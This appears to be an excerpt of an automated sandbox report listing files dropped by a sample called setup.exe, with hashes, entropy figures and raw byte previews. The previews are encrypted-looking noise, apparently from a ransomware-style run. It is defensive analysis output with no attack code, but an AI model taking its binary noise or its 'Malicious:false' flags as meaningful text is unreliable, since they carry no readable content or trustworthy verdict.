              SHA-512:C1BC1991894CCF066215850102CB28D022B267F0115832967AA1CE8FCDF336899986820FDDE282C1A49B34328B48CB8A65095C431A7AA51079514B05EA594954
              Malicious:false
              Preview:<?xml...|.v..w.;...t....b...qT.LZ.T.b.d..}_R@6Q.(..4..H...+.TcL.D.US....-....Lo.$..g....l0C...o.=.>R.d......n#4..[;..J#..q....| .rz.&..3..J.:.T.M...#.......^v...Qy........ ....w9.N{..+.2..."..vL..,...8....?.[....\&H..I.q.M...'&..u-.7..~."....&...)..(..e....-.q@+.`.w..L..9"..;h.....}=...../..oV.nup...*..{...}.....k..;H.@.\Z..?..O.h....9...K.....U%B...9<3.Po:.......G....R..3.......OY...C.l.'.<...)...a.... ....S....Vl.@........]a7.m4..QM$..ic..m.j...mZ.n;.R'*...l2mP....~.8'..4..R.."......;5 [Y....m....7..0:<_@..LEE&.....nt.U....#....Z..Yn.[..`..tOLy..).iB..9.hB....4.<.a....W.,....HI... X...P.i... .;.~x.._.z.....C...u.p....W.6@....Y..Gb.z'.+.c.o.y.+....]._|w...W..o...-..E.....pw.N >..k.....l..f..........n.[.>F.7 .....=..5...M..7g...uNq`.Asn......F....S}Q.7............mKW.k.:..W.L).w..E:.s........t...p..s..V.*k.f..~......U..xBg.F... .....).k..+.........Dj...[#u>.c;...(:....F.U.;[..W.....I.|j.z.l..2{...:..lH]z../.M..~.){.....M...&(_B...rz4.;.F.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3109
              Entropy (8bit):7.936434227197442
              Encrypted:false
              SSDEEP:48:IrKfQom02JXT1RQtDKZ5MsUGh1TMPthHS8rO5UDkbeNOBOLQH4qkuzEOfTNn5yD:IrKf5yXTI2zUWdMPt5SMO5UDOLZ41XqY
              MD5:14EF31E4F48FB6B8B140026377F7952F
              SHA1:41DC448A16607AFE2F8B8944F62A3E20B210B9AA
              SHA-256:9C1A0F79D41C3E9821907C515166E88F0A0F218C2A80E289EB8D1E9C582BB41E
              SHA-512:CBCCBC3DCF434B4A57266BBFB4FE211A850378FE54781E06D3E025134CDFD9070961AB2B3F6DCA9215FF47E5AE32FEB0807BC4E96CEBEE3B8ED8FD93E53AECC3
              Malicious:false
              Preview:<?xml|......5...}........c.../.o....@Q.3.r.d.V...7..drua./9]&0..%.Ym....#!.%.Rt%..M.M.6fd...f....YE?........X).d.P.pE..>....Oo'..._.....;.J....R \..)..k$...o.N>..?.....P@..uA..<]..\.......TV...U.E.x.OAt.fr....36qSj..-...t'=M.?..4=."....Ui(.G=&K.N.a...p@Wz.......Z...,bH...5.:.......B....(........1pr..B(....Mo...u...2bu.....U....U.."Z...XK.p..l^?...v7.d.j.s...B}..........y..+pj c.M...w..+.V....%./..=#M=.4..Pu.....s.s....4.....k...U-..>3..@.mi..n...=!..W.6....l.0..V..IM....+..........LB.{..J}.....EnM.|\u..N..6C.a7..G....3.:s.......%.....F.lZ...WC86..@......3..S.`....`...s=MpI..d.....b...cf.`...._..h%/Q.B.g......~.._..4.....%d.o.t..I....GT..6s.2v..{......P..p.9[.-.r......-Z.._1.V.^..2..`.r.m....._[(@m.t.=..Q.F..8....i..D..M-..,.J>.k.d....t..o...2...j.v..W.gc..R/K&...@p..X..5..V..-o...+....p.c....<%p...>D.-<7..,...".."D..d^....!..rjBL...e.N...hn..:}................$....z...=...........X..!@...u.`...7+L..h......J..e..!}..PI.".I..k@s.z4.w.1.*.nU=
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2126
              Entropy (8bit):7.8998655778482165
              Encrypted:false
              SSDEEP:48:7ZiU4kxuYDkZ+qJv85U49N+AYf/vA5dVs0lW+BU+il0D:tieQYIZjv8F9zYfwi00h+ia
              MD5:33F81BAFFD70B52CA32E332386183138
              SHA1:38A4BE68692EA61EF964865FD11F71E45E8E6A2A
              SHA-256:9A164DAF69ECAB85E8007C9929C994436DB22AE536FA966E2A972648E9C53D14
              SHA-512:25E1B9B22400F9D12E893E2F11D39C7D5EC41943C1ADED7D3AB6E7D39643B91CE029073C98AC53E4990DF8C9BAE9F8ED43F3A34F3F48A80B3FA06C0DB33B3B57
              Malicious:false
              Preview:<?xml..`...?-.........Z......Z.....<s..l#x=....^........Y[.S..M...H..k.../...B.L........O....J.1.W=....:.....3...A.V.....u.3B:..L+#V...M%..'..!...f.T|+.....L.....^..k..$.1....u~ZE..5....._vg".."..w.MR.._.I.9d...s&.$.......c...S5@...#.....F...6..u#W).s...1.(........y..6$.j.c.7.;...:.=...'+..]..@D.Pt...0^.a.t.~.w...n&.r.~R....w8.Y.VZ..U....8d..m..\...A8Q).6.N...Z.-....9.J`M...7.....$~...9...P.W..O....7.i.m.,0~..:..Qy6..Q)...=.[..........-.=.o.......33.v.N..|z.0.}.|..dM:...V..;.......-p..6Q.NJ..@......"...1....B.mV....w....Yj.@.gu.oe......`.5..=..,o...~..'|.a.J..*`;4Gz..H.M..h.....Z...<Qx......P'.8Ate<..2.8i....R...D.j.M.=........&S.....b.*Qq...&r..o6.g....u.U.BQ..f..PYF....=P..+K*...089..X.},..(..3^?.....ma..\;.@....^n..C.YA.%.9....S.U....LgaQ...d.@....@...U....w..N{.).9'.~.D1v.W..aP..b....."+...2.Re.:...dc'^..P......B.SX..V..0*....=....\n.|i...U .}...3.4x.....0.J.o.~.u.)..-.Wy...JCWW..rqs.y.7.l.c*....!...^.n.j....h..........Q.Sf.z.[
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1387
              Entropy (8bit):7.855198342214668
              Encrypted:false
              SSDEEP:24:w7mwtuKbnmW8PE3KW9JFQ9KbF7GYlfuuvsgWbD:wawoWmW7A47dWuvsgED
              MD5:5CCF384BE9E40FA58104BBE7D9B979ED
              SHA1:220309773AB05A520F4729B29C739FACEB088DCB
              SHA-256:D0CBE800DD6259A88AFCC4970064CC6D5CFF4F1851BD5A768AE68ED00C9098C5
              SHA-512:2ECE3ED0F56709FD3EDB8B6A280BD7C25CCEB4EE64E5A47E978A91A1F731D0235E957F2C1B940AD40F689C6C69C4BD2AFC7753276ACD73938FDB60ECC7D46914
              Malicious:false
              Preview:<?xml...,.].b..[..WY{....M+.o .?.........c...pP.....ve......i#....^{.8.....f.+..}0x....f{..A..z....|[ n..\..0.U. a.?.a..]E..&5........%..{.0....J.:mR.-.....yv.UKhG....j.gCv.>aO(.YS!.....i..j..61...g,..Q..t..O.J$........(..8..E[$.1nfAI...`4..l.@.Y.n..-..x.+%0..aG..9*..e#......./.x....H...k.70...................Hd...i.Lh.......CtC...........@....$!.L#...{)..+)......Q......c.ihg.s}>Y....c2......*..a!.&......#..r...E..(Q.'/...@....C]t1."_q..9g..y..*_%.:A......Z.....#..xn.lQv.B.......n...a.o..:#.R......)..0...~..7..zJq..P..2..1...Kd1U..M(.=...gfd,..Kl...6.....I.t%+wF_..S.f3...^.u.[........97A..h?..>.*.#.M.k<........3.W..t..v....fd...S...eH.$3...J......XM....:d..] .....'W..9."..Iq.Vt$.#....H....=.k.....e.......$......D...O..B....l....*3..=.k<.....W.v....k..*.4.~`.c.[..k.{.....?@?...8:k.QQ.z.P...K...^...{Q.~........(..,M.u....zp..R...[e...U.?.j;..v..>..J.z..s...K..)...=.A......6..g..E.('.....TS..$O.PT...3_/.,...X.%'..l.s..E........g
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):754
              Entropy (8bit):7.75241531900392
              Encrypted:false
              SSDEEP:12:ILZuy6NX13sxKS+1oY/yNr2XSUwWmcUCzYHjRkcm7N3wYEL5bg6zG136nVMT/r1u:ILZu7xS+GYgr2XSUwoZzwjfON3wpNz0c
              MD5:AB861C3DAC59778A86C671A9CF06EEAC
              SHA1:FE11D6AF4BE49757A3098545554E977FFD103186
              SHA-256:39AD39163E47FCEEE6965DC46944A286A66AB2F64FCEB7DE5E80E6CA27E18DA2
              SHA-512:2E388CE2BDD4307EB1795AA79278ADBD0A41D573DE23E02E926C87BDE978E665A4A77232D8DBEE54DCE69033A10F9CE0A5711D0C08FFE6A5029EA6DC96D50DE4
              Malicious:false
              Preview:<?xmlunNw$".*...z....,^.SL....].q.......7..t...).?%<9..S..?5......mVsq.4$..O...r.Ki.4.Z....D.O/?....e....tqo.b..G._....DR......c.j:J..s/..Qw.A.".pfJ=...v.q+X.T..^..x.8..B...[A..V].)..#...@CM.......R\=...B./.'..2...o&.'.B\x4C.o...d%..t-?..!...r......{...P.L...S..U.....w..&_.n.5......`.b....|F..nY.@...o)T...-1Tbk.....]..W....3._..w..W.|G..P.`CM.W.....].6...[.dYA..-.6U.I..dv#.JY.....H..8N.).{.O'.Zd...w.%.......rn.....AU.s..a]az.....Qc...h...2#sm....K..$Kp.~...y......uGj.8.+~..qW.O.sTD ...9.0pj......L.6..7....B..=...(.a.:4_"...2B.T.m..o.<..tk..R..........c./......&..v..S.B......C.....Z..$..U...bMyy....+$Q."i............^7T...SX.O...JVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1399
              Entropy (8bit):7.863556519026167
              Encrypted:false
              SSDEEP:24:2h9E1KpPF9qKt0nkI0xsLttJ3OiYCS22uYyhMWi/mmrkjo6Dr3N+5bRnWogD1pbD:E6189qKinRBtJ3O92TaN+o6P3iRWoWJD
              MD5:ECA9C9F7A9732E26B9320E29C35737B3
              SHA1:426E9F617F54A8F55BF94872296E0141E0BD1B10
              SHA-256:6F0C6964EE55D236E112952E203901C9FFC065A7B494838EAFEABEE28D4C214C
              SHA-512:D8ED58A352293D5904200F1DF4ECA0AD718CBD781D20F7A0E37B249D71CE6839597B5572E2E8E2627BA2C492F77F89C5C50B078280DBB554562788415D3E5A92
              Malicious:false
              Preview:<?xmly.......%.............t.6."Y...,.a.]sV.pt\....+0....g.......2V.5X.n@#g..........Jls.I]...q....`..m.k....#l.9.....T.mE>..3..d~....v.n...a.-...r2E..N~......D.].A...=1 ...v..\.8X....z...H..,..).LD....Y.~.^.xG.U)........u".=,#.'...d.2.-.....e...k..k.J....R..r...O'.|.'.....3.......Y........U....3..D...Iy0....X....f..$ !*....=...qi.......sE..G@...Pe.............M?.....U..A..6.vv..........TX&..~....$*...^.%:.XG...3r.tf..W..'...2.E....<,*53.4...f.?.7W...%L..g.C4\g...7.v....R..(..[i.c.G#.f.cO..c.%....1o..a.g..._..\.....2.`. $.[.....8MR......:..x.C..kH]..>^.......h..6.]........r...j#d.....bf...PQ.......m........0...?....L~i...-...IbT....Q+,.`4[..R..-U5#4C...K... Z....o.<.OP0.A...&].....2....gD V.....t=..G9^...3gk|n!.L..-.,zwd..Y.....WH(....K.0...A.c..N......7t4....+..N.i.......?F.t..K.;U.0`.b@........._..F..LE......x..y.2.R.@...T..d|.....'.+h.|.....9[..X....|.X'..a...[d0mg......n..B....7>.....(R..~..c...j.~......c-.K...B.R.F
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):708
              Entropy (8bit):7.670267077066942
              Encrypted:false
              SSDEEP:12:0bbYMMdMZN+mrg/dWTKO9onpOy/edSjn7Fd4qyGufj9FJXHWqMZusMR2cii9a:0I7Fmpp9Gl5vFDruTJaZ/bD
              MD5:D6B611D7DF784CD7FA44B5D8525E1377
              SHA1:0990EB5862370666EB2EC0894C5E6ADDA695D77A
              SHA-256:9555FECB5E18C5D9FED7FC03D685BE3D686BF25FC59BBC0366EBF8265BD12611
              SHA-512:8106703EB2AF400A43099002A990D35D0E179B94DC7DAC8212DB008654BECE84A8A9FFC042664323591D92416EBC1EF1665DDB0F9275D927ED910C49DA2C9E51
              Malicious:false
              Preview:<?xml..C...DZr.YS...<.0.....E....p=..T.N.R..'|.1.]....AVry.V}..S.8.....K....w...P...R.?0..*..^X.)..P.{.M}..~P..........R.hz..AH..q.Q.+.....7_w.P_.(..Q..:...g:....q.n.9..8CK..M4...9....r..L.&...tc.......6c..pjZc...,...+.:.a.O..f......Q$.9..?....?....o).N.S..8.f../...,.]E.~..Kf.......4.v.5....l.(..5\........+Y..T.~'.]pk>..7.@...........B.._L....K.L......-..i.Ucq..Ewg.woB..."..m..5L..3o.q..z.."...F.......>....4.....`d.N.f.=..>...6...`{._...Te.......b.&".5..S.r:...On.^.0.Q..en...M..:~x-.om.:.,..R0.sy..[y.....%.V..n..L......=......rT&.G~.|..+'j..._.v..J@...%..&o6...0....}T...}J.../$...0...U.|.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1132
              Entropy (8bit):7.827680721335669
              Encrypted:false
              SSDEEP:24:vWxoDYbPPXMYnXc60LnAZiQoTflqkXvErcXejFNLiQ9IyaldutmbD:iX3s608ZiQoTtqiqcQFNLF9Iyaldq0D
              MD5:A97EE269CFF57D410501A07989728E58
              SHA1:A4D7583C4D775C58E7CAF100F1D489A2916669AB
              SHA-256:EC1BCA434CE7E3B9132553DCF61CA90F859E7DEB109B3CD679CE186F721E7387
              SHA-512:DE6D9C61688BD5634CB9D9C2F8810BF0285CAE334F2B321FBD5FCBA390BC75BFCEDA2A0B08EF92711B0E2A2CC75BE5F97EFF1792E108B1514D965A7D5FDA8E1A
              Malicious:false
              Preview:<?xmlK.'U.:...s..."(\...k-.B...e....5..|....md.L..p.R....J.B:..`.?..7.WgxX..1.yU..6.g.....ZA...C.}..|..W.....=.a...3...........h..].c..7.k).w.........g.j..+q.....p:..&p.s.."..S.s.#..;..gg.N'..B....S1.D+...9C.&a..D.ma.q.e.d.........>.*...5.s.XX.~W.\...yu..Ja.['=j&.t..Q...@T.0.{(...=.x..J.!`d.X..^..V.\@M.VE.Nr,y....Rq..m.{.T.O2...d..HR.'.M......z...7.a.%.$w....P..E.-..].I...w.Ed,..#lYAwnh...opv....T=x.....4f?u.9.....xGm.r_i.F9d.}.....]...r........^.<.O-8.X.P.'...k.C.?......\..f..9y9&.8.....D.(Z#(8...GhD!...J.;.........D.q../....QGR....:.=...0jCr.sPCd...S8..NN......S{......jF.cx..p...^..,.Wm<.g..E..-T........>..H..(.[Z.%.J|.LpO...f..$"......}...C2......L.6.niz..x......0:.....Z'q].*(.3u.../.kj.N...A...F54/.F....QX.y.H5.*Y...E..4...8..:.3...TI..u.G..9k}|..Z..l'$.sP...z..Y.......D@.S..j..JAR`...j..uf].f..*h&...\,.n..3.b..8...0.1.7...'.{H.[..b....G...OR@...-4.L....F.....s...q'~..........:.?....... .r...,.-.)cu.....J...7.7uhul....yq.?..P:.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.688795717254165
              Encrypted:false
              SSDEEP:12:N1BP1L/B4w5UveKbnEA1Oaf3QImetGXVJUWu+Zf1WgD73AzsMR2cii9a:Ld114wAT11OWTmetGfUWu+SgHFbD
              MD5:864DA7FC43869C801450FAFB078D1269
              SHA1:A3AB234AF5F71F51E5B57E1976AC50B7D810A084
              SHA-256:20A33394E13AE752B80C287FC8F7CC9EB8A3FB72670EBB747F42F8036AF65A75
              SHA-512:DD95E85CB3D868FEB4C633FDB996459978809ABE5ECE2CA1094B78B877DF8D6899997762250F563E6154D978DA8DEB1EBF9017B480DCD28E114B1745A06C3D55
              Malicious:false
              Preview:<?xml:....TV..G....j..iks....76jh......O.....j.z,'.UMj....}...Q..f ...!1....\... ...c.. rb$=...;ZB-J.....q..FG..[kQ...h..:. f.^[.9-).z~.)z.`kq.."..X$... .xOt.0-j...X...C....k...,.R,tRX!.a.G.o?..ofo.3.J..NV.Hp....W.$....E.qT8...U..._..Wk../...X$n....p0....d,=F. .Y...;..XHx.v..rC(..>..d....V......l.^....7..q.K...^.u...3.[mH-.z.N.BZ.`...b.Ix.F/....+..m.nn..{`.{TrD...X..MF....qfT3L..w..?....rG(G/CP....Y...P.q....d......,4.....aO....F]>.p....Gd.J.(....SR.4.t.wW..J.....1..6...vt.$.....R.>?*..5V...........r|.D.D.q.T.wJ.......9..oAM.....`..8.>....?...Q.C_....EQ...9Ye.......E....\...x.......L.E.K.H$"z..U$.N<a..V..."...p?...q.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1094
              Entropy (8bit):7.804024310650183
              Encrypted:false
              SSDEEP:24:NlG0H9jYJxZgagzx65QtNLik2xPaGH/0/4vEuCuOIv5gO90DVYaRvfybD:NLdjW09NWTkgM/aeGwDVZwD
              MD5:2569D49E02CDEDDAEDA6681B972FEAD4
              SHA1:3FCD81EC9D6F30EFB902C0213D8B87CD610D59AD
              SHA-256:FF767ABEC01E111FEFE56ED549CF8B65BBB969AC4764A06DBB0DAE367D0D7F6B
              SHA-512:7973AC66D94A95A9090CC5B34B3F181C0D21B52FBA838770854008938BC9B48F6A706EEBFF4FD79EDAF7097B951305231A50AD34FB5A5EF4C9CFB2F973698B58
              Malicious:false
              Preview:<?xml.]#.r<T.....x....A<.kI.%...H]...[EW.'2....p.Y.....N.A!/.d.@K......,.q.q.>.........u.+....v.h....l.P.....i[...../..%..}.........i...~V..g....m..$...z<b..1.I|.o.0.=Pq,df$N....PM.M.@R.....>X.}S~J.|G...^....r.....-.i....6....6.1?.-.3....H.e6.U T..}.3...[.......x.."|.<..$.......yv..:n.?F.?+...`..&..Kq.].^y...q.B.A$e#.......r.8....7......z6t.&gS5......YZ....l......s...uW........H.b.a.s~1M>..T.a....6: ..L.+......+.U..Q.f.:n,...8.G']d.......a"..l.#45..q.or9..6..Fb.......%X..w.du..x.-........,;4.w....?>..P3a..e7.T.C.U...Z5..q5......8.....n..r....Lq.0.M.C.q..U.+.4..6.j.....\siof......s.'.N.l.9....K..x9Q.{...E...y..{.78.j.j..6.`{......M.R}?2s2......d..8..3.bZE....o..y1.l..2...,.9x.....X.G.H..F....Uq..x..M.b..$s...#s.v....BomU#...{U9..W.0.L.\...Ds.....nF..+.2..+..B>......:X.z.l...,K..'.k.9......`......@".Ht.Hv...P.....g.m.....\.F......5.?;...#.+.o.oi.FD.c ..-..2V.s:....$.....E....j....`c...M...u,.az.q.BY.u.s.YQ.6l...uEz............ .De.%..M......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8095
              Entropy (8bit):7.977276853684855
              Encrypted:false
              SSDEEP:192:q45uusH2JWQiA/m6GDfQox/2vfIEMnlIgmsMHn:q48XCWQiA/mtQLvfIEHJHn
              MD5:3299E7E6BD30B052B0560EA9D23565B4
              SHA1:094F7F209E14BDE934A5BCFB6A2E593BBCF3C32D
              SHA-256:05C265F24C143528D9356209C2FD7A5C5FA1ECABB8CA0DBF54FE693887758691
              SHA-512:3605EB40C8B1AF991204D67019E1DA1737FEF9A63CB46FAE9E6DCD67A7F0084861064BBE2E10121EBA4820D820CC8CCA1653A9FF0AA6C73E9D352E4B3D730B59
              Malicious:false
              Preview:<?xml.......................A.j#.8.._9.-.f.I...p.@....Q.ZR..,...'.mi..P.hk.....U.?..;`..(....?\..W.5.....-[......?...I........I;....1....;"....U.!H.......n....z...EJ...>.\..K...U$..5Pm1.x..$.w...T.{...L;.1....U.c.>...y+.`....w.-...q.......&.{.M."...(.0.VF..k...:.....|V`...Jl..B.|~.<g......sm..^$; 0.>...}.<0.u2&@8L..G%..f.V..).\...$.*....B[. .P<1...L..}.7.0w$CEnN...nh.H....#`.Ko].....D............EG..K..../.:......DgK_.3.<.)...kw.E.&z.:.Q.8.9...WS%.5..x.e..P2.)G.......C.a..<.|......2U.....XG.E.+#.$Y.X.0..n.H.......NBI.;z..K.d....qra_...[1..z[.....X..A.ZU.....K..&.Q.<.t....EB&n...d.....81..j...,@I.L..7AUh.`.|...!..A.I.0Z/.>.[h......&;Ab.....M..;.Q'..Jt...v>1.....].H...F...f0.........A...sZ`.....z4.Q..T.....L.{..w...._.a..V.5c..u...:hM.......&..)..y...n.h...eC.G..~:....4{.},.;.D-%^...#..mB.D....C:..:.?...6..5.8\..$.......t4.k....6c.w..../.Gu.R.*g)0pC<...D[.{..D..M.YI.c..4t"..1`......[..T......lt......t.p.u..#..C......C.#0.."..~.[.I<. .7
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1047
              Entropy (8bit):7.790617428404887
              Encrypted:false
              SSDEEP:24:sBZH8Ja6weYGP/k2Ow3lcZG0DV7fprI8gJmGl12wfOkbD:BTYGXHD3SZG07rxV1ZuD
              MD5:AD64848A8021E6245EB41E9529E98C32
              SHA1:E42D03055CA920DBE9BB6634D311602E60344935
              SHA-256:63A60C53BD314671F839A7FE5615CEBC8A5E4B89334114621D8CD3BF1D02DC48
              SHA-512:3D8A01CAD59F825859A1986289B0725636358410717BBD9B53AE166C7AB4976D35C8EAD9267715028F09C043EF57C76D93B5D5F8E97EC9D14EB5ED9A68053E0C
              Malicious:false
              Preview:<?xml.vrU.#....`1....TD....8._.Hx.`.r._,DN..,...G....Xd.hk./.&Ai>....a.h.">....$.6!.V..Z...i;.@x.H...<4.....gL....#...a8...........8..M"/Z...W4\.w..7..sJSg<3n.f.....".78.I.P_9.2.....`.f.K.E..x..!..QLB..y.3...G...A.9.'..Q.eG...$;....$..[.".......cA..JA.&.P[em..F.z..CUW.....cj-A.s%t..V$Z.[...Eqi)...?..X..........L."...%Hw.Z.e-......{|...`....ag.......8..vA.......!.)6Ct. \|~.....2}..J...y.\.+.......2.v...8....{Zh...s..r...l...22.....q.3;...X.t.@. .t....;....p .b...v.9U....S.{.>.j=.9_.#n...q.7..N...NP9.....Z.C$_.......{.+....)..I...'4=#..\skk.....S.s..3J..p...B..k..._..~t.A$l.2Q.B.<.a9...).}....$J4...}jp.,.G..a.-.,.[O...C.......Rh..=.[wQ$.v..Y...n.Y...Dz...W.?.e.oS..DU.l..B...c3*.|Hp.?.....b..C.......k..)P]....xMB.......Hh.S.b..8v.a.l...#..N..y4...wz5....;.n.5..?... ...6.!..&..r7....Y.Zl<..N..9..H..VK.Y........?......X.(.........K...`..>.g..>.u...$.AsFq.mGe...;..;..s...q......Y..rtE....x`].*,.M..Fw`o*VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDC
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1003
              Entropy (8bit):7.806190491014199
              Encrypted:false
              SSDEEP:24:/slpuwYXmWddTol4W0fcgsgxPJZGXhlHNtvRwZvaivbD:57k4j0g1xPJ6d54CizD
              MD5:28095228D06F87AE4B629ED4F0DA42DE
              SHA1:DBDE0A8AB877A48B1199BA03DD00566FF7DA1968
              SHA-256:69043BF7BA5E01F0E86FC7EEA48DCD2593493EF304546E9B68E47C4B263E77EA
              SHA-512:978D46FEEA995DBF3602CEC872E9DDDD02A7C04C1358BB02D9FA9058A8C577C37162AC5DC18C3004B3A3A769E68B3C01A96C22D1660E477E0622F7DF743D0F2E
              Malicious:false
              Preview:<?xmlP..A.z..RF..O.p..>........m.....$L."................K.`E....M..Ut.~..0.rJ.$|...oB.)c%.;h..k?.T.O ..t..'r.m.z..*.T5.U.....d[....5a....3AX.PZ.xG.Y_.d..M.....6.a.\.ja..B..G....{.r.M.}.8..?.a!..1h..A...j.%..<...s.../ Q_.....9=.2q}......a.#....^....m..."f....?.Y.....?.....l.8.#1~..f..Yh...,d,A3#\..6U....Z....6.*;..S..../S..U.P..W.......a.(1h..vTg.*..EFV...>A..]....|\.Q..k.\.......b....\....xI..r7.T..v....yW2..j...Rd..+....9O.Wq.g...oW.)......o...U5...?..&.(s.h.-..-.......kc.S.j.....w.d..y..b..e..K9p../.........s:..9.Z;..RYO.D...3N!k...J.o.1..t;.x.>GB...'..{.O..v.Z...X?....k....2.......d......QfZ.w..LS...>.*t.~c...J..`..O.Y.&.D.>tA.3p...D!.!.=,t.=`N..>..B....-W.l........z2.J.v....*c0$...1m....$.h&3...2.v.u.N....'...w.%"xBJ@...:...&.2?...GIi....~q.B-..O6$...9NL.m..s..q..e....n..'....N:.$k.0 ...H.A.o.b..N.$.........#<..yZ.R'.}~...<c..&.X...^$....Y....L...._I......CY.~..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2980
              Entropy (8bit):7.936938465492708
              Encrypted:false
              SSDEEP:48:63E38VkNyKuTK9DvaX/baNmmEWIIGAu4y6lg0PRf7/j8KCW0lD:uE3FyfmJCammEWq54y6lg67/jpI
              MD5:5BF0C5ADD0C018C27DB8D9877BEDE7EF
              SHA1:298708A462470DFE7DD4D013232628BFD6815A9C
              SHA-256:885AE096EFA6A84E680CD9633E5EBD4EB57D2A1D3D46A5197071B83414FA5B13
              SHA-512:27ADB67F7A38F966EDCFE4A1A4688283564FD16A94B143A45E2088360ECE8809BD7C140DA262E797C5FA2CD1A98C4F620AD4C0F4326462B928680CD7E5074C6D
              Malicious:false
              Preview:<?xml.+..-ik........R0.....'.m..g...*}.....Gs....s(.v..3........L%.(.\6.S...K.G."+.-/~..).......(!.c<J..b..`.8L........V.....@.......M;.l.km....w.L.i.k...4w.s. ....r...?I...NH..U%.Vo+..O......[...E...t...eQ..R.j...:...X....i..f.b.4..@...!.z!_...a.GM.......$.N...s.3.=g0.)......Xc...n.w.../.4JP.....fk1&WJ.a.db..-..=i+......H+...c.Ea...,....<m.z.&.fD..@_I..*"I.^w.CF...u...2...rl.............Ub.#...a....$...X..8...5Z'.l.....I....E),X...S.z\..Y....I...9Q`..O...3..4....F7...V....T.......PH.'.D....9.~..P;.6......-....K(X..=C..-..e.*...?j....`>.M.M...u.. m..Z..o.hX...3'._,...%.......BC..6.....r....Tx....O^^..ZQ..m.zE....ZF.....~..z.6..|k..j...._.#..B....[FQ..r.......f._._~....N....$.)..y..>.....Z#0.A.......3XO.fl......'..2.&".g..K,/...5I.%p+.jO.....mV...$.K]..&.X.....;Q.=cK..N&....c..6...m...0...H;..U..=....\>.."H.......*......a~adB..p{..i.Y2..@..O.....-&g`..pb.......k...^D.......k.......k.*..;>$.|.{..... .4<9.. ..:Y..0...:....."..X..M..AX>.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2672
              Entropy (8bit):7.933028724282561
              Encrypted:false
              SSDEEP:48:mP7V0gzE5AJY/WotQX5gl8Krj93Q0BWzIi/nV+Il9p6Kd0r/+LQTUhzxED:mP76guDqJmrj5RBWEAV+YPkr/+LQAJxQ
              MD5:4B7464DA8EACFBBF3D8B0958E04D936E
              SHA1:BEDC2975F38D88BBB850D5EC66DADDE8D1C983B3
              SHA-256:40FE0FF395085EE36AB26A3038DC48B2BDCF3D413538884B257CF95DEC9F7C51
              SHA-512:D56ED68A247D1F7E0A2793E16575766EDA901E064011DEDF09E00EE9D4F1513449E5148A1B766E32DB21A64F2CE65BFC35680831D3A6D131073F7A0AE332ED3C
              Malicious:false
              Preview:<?xml.R.......a.[.@....6....<.r.h......c.-...d.f.*V'.E...2o.........>.)P.....8......?f.;..2C...t.cI9.32.P....t.8?].....SN....s.?"}!.n..pr..=..4.....F9e...@...%.KiG...7...uK.._.w[.sH...yKbP.T....x....>.t6..?.a..(.P..;h. .&.f,..5)...{...;&....W.m...Tj...UgB.....).q`.s.5..(..D/o...A(./l...:\|.....J..N.c~.. .........R..J.3W.#...yp...]_`..Y.T..7..Wl.~Da..L.....r..w...J.v...y;t..c..Ee.&v..d+...-;.m.''.m.w....<$.....Y.b.o.Ur...Ea..W.0.L..d..3%...".x}.E.)..|...<UWbFw.:.....!&.g&.. .5..L_.n.....|u=W.......t..Q....<...........X....]...Z....._\.,BF.T..N.D......67.]..n.../. ...G.....bPN..l.<*5$.....0...l=..=.....0/..s.j..i..d..D..V...7$.C...;.&p..`...*,.#.c_.W"..99.....t..n....T'P..Vm.G...~.<...p........~\.A,..w.i... .....y^|..^.D`1.7......!.s.L.........:..J..Jz+..{.`.<...jC..8.....L..........)...~a.....\...+....'........3..,..&|.{N.4..=-....A.W;.C,Y...O*y.8H..._..7.....p...m...w.!..T/..*.n.I.(.4.>f........V.Fg..v.....Q....6.'!...._..z.H.......&}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2762
              Entropy (8bit):7.92045257114074
              Encrypted:false
              SSDEEP:48:S4BkNbBUi7PW7+Gukj3Ut2VKplOgSafpj0tTMUNjUzxttEC+SB7PJNuaVCXAncAa:rkNbBUi7O7nLj3UtZe7SKMU6KC+WrJRk
              MD5:26C2D15EA34AA1AF119EE69B98896925
              SHA1:10460A6AD5DCB0BABD637B039ED574FD0F266606
              SHA-256:F69A9AD6E3516D04675F32A6019EC2A15B8ACC3F16E0DAB2FDFFC5D199AA60EC
              SHA-512:06FEAE366F2BBEC4CEE989C33FBE961F8A42627C07D5B2E9CA4B1DFF685F3E0926D99D4D14CE8249D51A0B0CB44DCE10A80A76FCF29BA2A26D2B5B53317C30B4
              Malicious:false
